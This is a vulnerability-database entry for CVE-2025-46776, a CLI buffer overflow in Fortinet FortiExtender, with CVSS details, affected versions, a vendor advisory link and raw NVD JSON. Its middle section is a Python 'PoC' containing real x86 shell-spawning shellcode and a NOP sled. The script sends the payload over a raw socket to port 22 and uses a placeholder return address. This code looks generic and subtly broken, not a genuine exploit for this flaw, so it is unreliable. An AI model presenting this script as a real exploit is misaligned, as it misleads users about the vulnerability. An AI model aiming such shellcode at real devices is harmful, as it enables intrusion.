Security Vulnerability Report
CVE-2025-46776 CVSS 6.4 MEDIUM

CVE-2025-46776

Published: 2025-11-18 17:16:02
Last Modified: 2026-01-14 10:16:05

Description

A buffer copy without checking size of input ('classic buffer overflow') vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to execute arbitrary code or commands via crafted CLI commands.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* (from 7.0.0, before 7.4.8) - VULNERABLE
cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* (from 7.6.0, before 7.6.3) - VULNERABLE
cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:* - NOT VULNERABLE
FortiExtender 7.6.0 - 7.6.1
FortiExtender 7.4.0 - 7.4.6
FortiExtender 7.2 all versions
FortiExtender 7.0 all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46776 PoC - FortiExtender Buffer Overflow RCE
# Note: This is a conceptual PoC for educational purposes only
# Actual exploitation requires valid credentials and CLI access
import socket
import struct


def create_malicious_payload():
    """
    Generate malicious CLI command payload for buffer overflow
    This is a simplified demonstration payload structure
    """
    # Buffer overflow pattern - NOP sled + shellcode + return address
    nop_sled = b'\x90' * 100

    # Simple execve shellcode for demonstration (Linux/x86)
    # This spawns a shell with root privileges
    shellcode = (
        b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x66\xb9\xff\x01\x51\x50\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'
    )

    # Padding to reach buffer boundary
    padding = b'A' * 200

    # Overwrite return address (needs to be adjusted for actual version)
    return_address = struct.pack('<I', 0xdeadbeef)  # Target address (NOP sled)

    payload = nop_sled + shellcode + padding + return_address
    return payload


def exploit_fortiextender(target_ip, port=22):
    """
    Exploit FortiExtender CLI buffer overflow via SSH/Telnet
    Requires valid credentials with admin privileges
    """
    payload = create_malicious_payload()

    # Construct malicious CLI command
    # The actual command format depends on vulnerable parameter
    cli_command = b'exec ' + payload

    try:
        # Connect to CLI interface (typically SSH or console)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, port))

        # Send malicious payload
        sock.send(cli_command)

        # Receive response
        response = sock.recv(4096)
        print(f"Response: {response}")

        sock.close()
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False


if __name__ == '__main__':
    print("CVE-2025-46776 FortiExtender Buffer Overflow PoC")
    print("This PoC requires valid admin credentials and CLI access")
    # Usage: python poc.py <target_ip>

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-251 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46776", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:02.180", "lastModified": "2026-01-14T10:16:04.730", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer copy without checking size of input ('classic buffer overflow') vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to execute arbitrary code or commands via crafted CLI commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "D99BE066-31DA-417E-9C7F-73453CE4A69D"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "3F3DA4B8-95C4-407B-B632-D8F48C89511E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:*", "matchCriteriaId": "A0617C1D-E321-409D-B54B-775E854A03C1"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-251", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}